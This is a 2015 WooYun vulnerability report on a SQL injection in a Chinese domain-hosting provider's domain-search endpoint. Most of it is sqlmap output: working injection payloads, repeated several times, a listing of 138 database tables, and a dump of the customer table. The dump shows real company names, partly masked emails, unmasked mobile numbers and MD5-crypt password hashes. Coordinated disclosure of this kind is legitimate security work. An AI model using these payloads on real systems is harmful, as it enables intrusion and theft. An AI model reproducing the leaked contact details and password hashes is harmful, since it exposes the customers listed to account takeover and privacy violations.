缺陷编号:WooYun-2015-0138534
漏洞标题:东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
相关厂商:东方网景
漏洞作者:路人甲
提交时间:2015-09-04 11:10
公开时间:2015-10-22 08:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开
东方网景爆炸漏洞至少上万网站沦陷,均可getshell,N多域名劫持,FTP服务全部沦陷,服务器集群,内网沦陷等等,涉及京东,华为,大量国家研究所,核电网站,银行等
注入 主站注入,我也呵呵了http://**.**.**.**/domain/searchDomain (POST)type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9C
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 |
sqlmap identified the following injection point(s) with a total of 1192 HTTP(s) requests:<br> ---<br> Parameter: Array-like #3* ((custom) POST)<br> Type: boolean-based blind<br> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br> Payload: type=cn&cn=1&docids[3530]=-9870) OR MAKE_SET(5995=5995,6331) AND (1452=1452&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL <= 5.0.11 AND time-based blind (heavy query)<br> Payload: type=cn&cn=1&docids[3530]=388) AND 6167=BENCHMARK(5000000,MD5(0x4e59717a)) AND (5138=5138&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CParameter: Array-like #4* ((custom) POST)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND 5433=5433#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT 5620 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(5620=5620,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("HXpx"="HXpx&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: stacked queries<br> Title: MySQL > 5.0.11 stacked queries (SELECT - comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8");(SELECT * FROM (SELECT(SLEEP(5)))zGYl)#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT * FROM (SELECT(SLEEP(5)))jyDO) AND ("IRjb"="IRjb&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: UNION query<br> Title: MySQL UNION query (NULL) - 3 columns<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") UNION ALL SELECT CONCAT(0x716a787a71,0x6f596a504a674d51595a,0x7170707171),NULL,NULL#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9C<br> ---<br> web application technology: Apache 2.2.22, PHP 5.3.17<br> back-end DBMS: MySQL 5.0<br> available databases [1]:<br> [*]sqlmap resumed the following injection point(s) from stored session:<br> ---<br> Parameter: Array-like #3* ((custom) POST)<br> Type: boolean-based blind<br> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br> Payload: type=cn&cn=1&docids[3530]=-9870) OR MAKE_SET(5995=5995,6331) AND (1452=1452&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL <= 5.0.11 AND time-based blind (heavy query)<br> Payload: type=cn&cn=1&docids[3530]=388) AND 6167=BENCHMARK(5000000,MD5(0x4e59717a)) AND (5138=5138&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CParameter: Array-like #4* ((custom) POST)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND 5433=5433#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT 5620 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(5620=5620,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("HXpx"="HXpx&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: stacked queries<br> Title: MySQL > 5.0.11 stacked queries (SELECT - comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8");(SELECT * FROM (SELECT(SLEEP(5)))zGYl)#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT * FROM (SELECT(SLEEP(5)))jyDO) AND ("IRjb"="IRjb&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: UNION query<br> Title: MySQL UNION query (NULL) - 3 columns<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") UNION ALL SELECT CONCAT(0x716a787a71,0x6f596a504a674d51595a,0x7170707171),NULL,NULL#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9C<br> ---<br> web application technology: Apache 2.2.22, PHP 5.3.17<br> back-end DBMS: MySQL 5.0<br> available databases [3]:<br> [*] epms<br> [*] epmstest<br> [*] information_schemasqlmap resumed the following injection point(s) from stored session:<br> ---<br> Parameter: Array-like #3* ((custom) POST)<br> Type: boolean-based blind<br> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br> Payload: type=cn&cn=1&docids[3530]=-9870) OR MAKE_SET(5995=5995,6331) AND (1452=1452&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL <= 5.0.11 AND time-based blind (heavy query)<br> Payload: type=cn&cn=1&docids[3530]=388) AND 6167=BENCHMARK(5000000,MD5(0x4e59717a)) AND (5138=5138&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CParameter: Array-like #4* ((custom) POST)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND 5433=5433#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT 5620 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(5620=5620,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("HXpx"="HXpx&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: stacked queries<br> Title: MySQL > 5.0.11 stacked queries (SELECT - comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8");(SELECT * FROM (SELECT(SLEEP(5)))zGYl)#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT * FROM (SELECT(SLEEP(5)))jyDO) AND ("IRjb"="IRjb&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: UNION query<br> Title: MySQL UNION query (NULL) - 3 columns<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") UNION ALL SELECT CONCAT(0x716a787a71,0x6f596a504a674d51595a,0x7170707171),NULL,NULL#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9C<br> ---<br> web application technology: Apache 2.2.22, PHP 5.3.17<br> back-end DBMS: MySQL 5.0<br> current database: 'epms'<br> available databases [3]:<br> [*] epms<br> [*] epmstest<br> [*] information_schemasqlmap resumed the following injection point(s) from stored session:<br> ---<br> Parameter: Array-like #3* ((custom) POST)<br> Type: boolean-based blind<br> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)<br> Payload: type=cn&cn=1&docids[3530]=-9870) OR MAKE_SET(5995=5995,6331) AND (1452=1452&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL <= 5.0.11 AND time-based blind (heavy query)<br> Payload: type=cn&cn=1&docids[3530]=388) AND 6167=BENCHMARK(5000000,MD5(0x4e59717a)) AND (5138=5138&cndomain[]=.%E5%85%AC%E5%8F%B8&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CParameter: Array-like #4* ((custom) POST)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND 5433=5433#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT 5620 FROM(SELECT COUNT(*),CONCAT(0x716a787a71,(SELECT (ELT(5620=5620,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("HXpx"="HXpx&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: stacked queries<br> Title: MySQL > 5.0.11 stacked queries (SELECT - comment)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8");(SELECT * FROM (SELECT(SLEEP(5)))zGYl)#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") AND (SELECT * FROM (SELECT(SLEEP(5)))jyDO) AND ("IRjb"="IRjb&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9CType: UNION query<br> Title: MySQL UNION query (NULL) - 3 columns<br> Payload: type=cn&cn=1&docids[3530]=388&cndomain[]=.%E5%85%AC%E5%8F%B8") UNION ALL SELECT CONCAT(0x716a787a71,0x6f596a504a674d51595a,0x7170707171),NULL,NULL#&docids[3521]=389&name=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E8%A6%81%E6%9F%A5%E8%AF%A2%E7%9A%84%E5%9F%9F%E5%90%8D&cndomain[]=.%E7%BD%91%E7%BB%9C<br> ---<br> web application technology: Apache 2.2.22, PHP 5.3.17<br> back-end DBMS: MySQL 5.0<br> Database: epms<br> [138 tables]<br> +-------------------------+<br> | user |<br> | account |<br> | achievement_adjust |<br> | activity |<br> | ad |<br> | alipay |<br> | article |<br> | article_category |<br> | attorn_domain |<br> | backup_apply |<br> | cart |<br> | cart_product |<br> | cashback |<br> | category |<br> | cms_category |<br> | cms_doc |<br> | cms_doc_news |<br> | cms_doc_product |<br> | cms_label |<br> | cms_pos |<br> | cms_pos_doc |<br> | cms_template |<br> | crontab_log |<br> | delayed_renewal |<br> | department |<br> | dns |<br> | dns_log |<br> | domain_contact |<br> | domain_dns |<br> | domain_optrecord |<br> | email_template |<br> | epms_resource |<br> | file |<br> | ftp_agent |<br> | ftp_group |<br> | ftp_quotalimits |<br> | ftp_quotatallies |<br> | idc_ip |<br> | idc_iprange |<br> | idc_optlog |<br> | idc_row |<br> | idc_server |<br> | idc_shelf |<br> | idc_switchport |<br> | idc_vlan |<br> | idcwork |<br> | invoice |<br> | invoice_flush |<br> | login_log |<br> | order_payment_confirm |<br> | order_product_domain |<br> | orders |<br> | orders_access_password |<br> | orders_change |<br> | orders_payment |<br> | orders_product |<br> | orders_track |<br> | payment |<br> | price |<br> | prima_tabLogins |<br> | prima_tabMembers |<br> | product |<br> | product_category |<br> | product_package |<br> | product_package_domain |<br> | product_parameter |<br> | product_parameter_value |<br> | product_price |<br> | product_service |<br> | product_staff |<br> | program |<br> | program_process |<br> | project |<br> | project_order |<br> | question |<br> | question_category |<br> | question_process |<br> | refund |<br> | renewal |<br> | renewal_category |<br> | rent |<br> | role |<br> | role_resource |<br> | role_staff |<br> | service |<br> | service_changeUser |<br> | service_database |<br> | service_dns |<br> | service_domain |<br> | service_domain_access |<br> | service_email |<br> | service_email_host |<br> | service_expand |<br> | service_extra |<br> | service_ftp |<br> | service_ftp_domain |<br> | service_ftp_host |<br> | service_function |<br> | service_log |<br> | service_package_split |<br> | service_renewal |<br> | service_rms |<br> | service_tongyong |<br> | service_trial_change |<br> | service_upgrade |<br> | special_domain |<br> | special_price |<br> | sqlmapfile |<br> | staff |<br> | staff_credit_pay |<br> | staff_credit_recharge |<br> | staff_credit_return |<br> | staff_log |<br> | support_Customer |<br> | template |<br> | tongyong_domain_contact |<br> | trade_sum |<br> | trial_form |<br> | trusted_sites |<br> | trusted_sites_data |<br> | trusted_sites_domain |<br> | trusted_sites_log |<br> | update_password |<br> | update_time_log |<br> | user_agent |<br> | user_data |<br> | user_data_sign |<br> | user_domain_info |<br> | user_email |<br> | user_extend |<br> | user_findpwd |<br> | user_money_pay |<br> | user_money_recharge |<br> | user_product_package |<br> | user_product_parameter |<br> | user_seller |<br> | webnic_data |<br> | zhekou | |
借用360的,我的MD5解不出来
7000度用户
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
web application technology: Apache 2.2.22, PHP 5.3.17<br> back-end DBMS: MySQL 5.0<br> Database: epms<br> Table: user<br> [7993 entries]<br> +-----------+----------+---------------------------------------------+------+-------+----------------------------------------------------------+--------+--------+----------------------+--------+--------+---------+-------------------------------------------+-----------+-----------+---------------------+-------------+----------------------+-----------------------------------------+<br> | uid | agent_id | name | flag | money | email | status | seller | mobile | remind | verify | level | password | save_lock | user_lock | last_login | login_times | last_login_ip | login_username |<br> +-----------+----------+---------------------------------------------+------+-------+----------------------------------------------------------+--------+--------+----------------------+--------+--------+---------+-------------------------------------------+-----------+-----------+---------------------+-------------+----------------------+-----------------------------------------+<br> | 278 | 0 | 首都发展委员会 | 0 | 0 | zhangyin@**.**.**.** | 1 | 95 | 13717766961 | 1 | 1 | 0 | $1$AMLNUWFu$vgmcj73f9ngpiYUaMFbTq. | 2 | 0 | 2014-06-18 20:58:24 | 17 | **.**.**.** | <blank> |<br> | 285 | 0 | 北京东方网景信息科技有限公司常芸薇 | 0 | 0 | changyunwei@**.**.**.** | 1 | 0 | 13524586974 | 1 | 1 | 0 | $1$dmNUGghM$k1UACdj68b3bO8BILkamO1 | 2 | 0 | 2013-12-04 12:18:38 | 58 | **.**.**.** | <blank> |<br> | 372 | 0 | 东方网景内部测试 | 0 | 0 | marketing@**.**.**.** | 1 | 108 | 123456878962 | 1 | 1 | 0 | $1$YdbM6eXx$rM1brIcups147u9I19VM40 | 1 | 0 | 2015-08-30 23:28:15 | 230 | **.**.**.** | <blank> |<br> | 382 | 0 | 张谦 | 0 | 0 | xiaozhangqianabc@**.**.**.** | 1 | 95 | 18910234979 | 1 | 1 | 0 | $1$l8geSfHt$SeDXp.nsvwSmXklKBOON00 | 2 | 0 | 2013-12-07 10:46:00 | 19 | **.**.**.** | <blank> |<br> | 100200005 | 0 | 北京通力环电气股份有限公司 | 0 | 0 | manager@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$1inV4igF$zHfPhIT/jsNd1uz/A8mob. | 2 | 0 | 2008-05-16 14:09:31 | 0 | <blank> | user100200005 |<br> | 100200012 | 0 | 新烟食品有限公司 | 0 | 0 | wangjian@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$OCF8vS3Z$uf7m1ZfSqRUEClDicX8F3. | 2 | 0 | 2005-03-31 08:36:49 | 0 | <blank> | user100200012 |<br> | 100200019 | 0 | 北京铜牛集团有限公司 | 0 | 0 | liujunzhong@**.**.**.** | 1 | 36 | -- | 1 | 1 | 0 | $1$Ude7x3KO$FuBfUaAMXqgWCjMG6QGoH/ | 1 | 0 | 2015-07-14 16:39:03 | 5 | **.**.**.** | user100200019 |<br> | 100200027 | 0 | 北京画院 | 0 | 0 | bjhy@**.**.**.** | 1 | 119 | 11111111111 | 1 | 1 | 0 | $1$ZPLfkxdO$ZAfuFvFzBtR9c/GsIYy/f/ | 1 | 0 | 2014-09-22 14:51:57 | 3 | **.**.**.** | user100200027 |<br> | 100200033 | 0 | 中国核工业二三建设有限公司 | 0 | 0 | liangyongping@**.**.**.** | 1 | 39 | 18910886040 | 1 | 1 | 2 | $1$wvoyM9qf$qdddy7yAXZzd3YLiwAAhr0 | 1 | 0 | 2015-08-27 11:44:01 | 46 | **.**.**.** | chenqi401 |<br> | 100200038 | 0 | 哈尔滨锅炉有限责任公司(哈尔滨锅炉厂) | 0 | 0 | hbc_duyalian@**.**.**.** | 1 | 39 | <blank> | 1 | 1 | 2 | $1$YZjCXm19$leVgBCwhWmdeixWKX7Oog1 | 1 | 0 | 2015-07-03 14:04:12 | 46 | **.**.**.** | user100200038 |<br> | 100200054 | 0 | 北京华章图文信息有限公司 | 0 | 0 | lizhi@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$nUE01CcI$ym0M9/1XC8ShdrE3.fBIz/ | 1 | 0 | 2015-07-01 08:58:50 | 6 | **.**.**.** | user100200054 |<br> | 100200064 | 0 | 青岛美高化工有限公司 | 0 | 0 | meijing@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 0 | $1$7NxG8pYd$LUDEkZHOANXp.LAmYHO6P. | 2 | 0 | 2000-05-13 16:54:58 | 0 | <blank> | user100200064 |<br> | 100200080 | 0 | 航天信息股份有限公司北京航天金卡分公司 | 0 | 0 | htjk@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$Pa3LFGyz$Ssa2XsUEj0Nb9D/5Vfm7z0 | 2 | 0 | 2005-03-22 09:48:31 | 0 | <blank> | user100200080 |<br> | 100200089 | 0 | 山西祎达特钢集团有限公司 | 0 | 0 | postmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$hxtdLZLb$/rCfc02/M6Fnn7YZ4iXTG1 | 2 | 0 | 2010-11-01 14:17:04 | 0 | <blank> | user100200089 |<br> | 100200103 | 0 | 北京汉仪科印信息技术有限公司 | 0 | 0 | lenghuaijing@**.**.**.** | 1 | 37 | <blank> | 1 | 1 | 2 | $1$jQUnyEiX$xNSbtWbZkbHY/qWYxPDds. | 1 | 0 | 2015-06-17 13:03:31 | 19 | **.**.**.** | user100200103 |<br> | 100200117 | 0 | 北京市宾宾工艺品集团 | 0 | 0 | webmaster@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$keaQ1t5L$qOezRW648K0Cg3zlPVx6Z/ | 2 | 0 | 2003-07-03 10:55:10 | 0 | <blank> | user100200117 |<br> | 100200124 | 0 | 北京云星宇交通科技股份有限公司 | 0 | 0 | yhn_sky@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 0 | $1$OLVDu65T$VJJFyr7Q5gosdZNxjgq5T. | 1 | 0 | 2015-08-17 13:50:30 | 16 | **.**.**.** | user100200124 |<br> | 100200133 | 0 | 北京万海置地房地产经纪有限公司 | 0 | 0 | wilson@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$gjqhnhou$3YKlSe.DBMD21nWZxP5Pa/ | 1 | 0 | 2011-08-08 15:01:14 | 0 | <blank> | jonathanchen |<br> | 100200152 | 0 | 上海华明电力制造有限公司 | 0 | 0 | 8314668@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$QfblMpOu$QJAcRIVISDrEqP7DOoQYe. | 1 | 0 | 2014-10-08 13:15:11 | 4 | **.**.**.** | user100200152 |<br> | 100200217 | 0 | 河南豫光金铅集团有限责任公司 | 0 | 0 | zb@**.**.**.** | -1 | 37 | 13069461008 | 1 | 1 | 0 | $1$lXsg6s95$6CJbtOK0rWahHEKXEGapS1 | 2 | 0 | 2013-12-18 11:39:39 | 3 | **.**.**.** | user100200217 |<br> | 100200236 | 0 | 北京绿世界环保技术有限公司 | 0 | 0 | zzb_0513@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$ifiT3LbQ$PLaLtQ8rPFkaY0Za3LCxr/ | 2 | 0 | 2008-03-10 13:16:30 | 0 | <blank> | user100200236 |<br> | 100200238 | 0 | 上海贺利氏工业技术有限公司 | 0 | 0 | lisa.gao@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$flJbtLrL$eSNXw.IaIOHQKpgQT47uS. | 2 | 0 | 2011-12-06 08:36:11 | 0 | <blank> | user100200238 |<br> | 100200246 | 0 | 北京欧普科特科技有限公司 | 0 | 0 | caojuanjuan@**.**.**.** | 1 | 119 | <blank> | 1 | 1 | 2 | $1$cJK122t5$ACjApDX2PiuGv3VGvPAZQ. | 2 | 0 | 2014-04-21 11:17:23 | 1 | **.**.**.** | goldway |<br> | 100200263 | 0 | 上海金万利领带有限公司 | 0 | 0 | [email protected] | 1 | 36 | <blank> | 1 | 1 | 0 | $1$Ju1ToxrH$9GrCZeP8dsLdZFqco8w4n. | 1 | 0 | 2015-04-07 13:53:03 | 2 | **.**.**.** | user100200263 |<br> | 100200264 | 0 | 上海星峰工贸有限公司 | 0 | 0 | fyxu@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$A3T9k25X$WXg.7jO1DJ5eLk8kZlzjz0 | 2 | 0 | 2006-02-14 10:38:35 | 0 | <blank> | user100200264 |<br> | 100200287 | 0 | 安徽省宁国市耐磨材料总厂 | 0 | 0 | aibo@**.**.**.** | 1 | 36 | <blank> | 1 | 1 | 0 | $1$YJ6XtCQs$rYbAjsGhopj5kKiNh/MTP/ | 1 | 0 | 2015-06-26 16:41:23 | 16 | **.**.**.** | user100200287 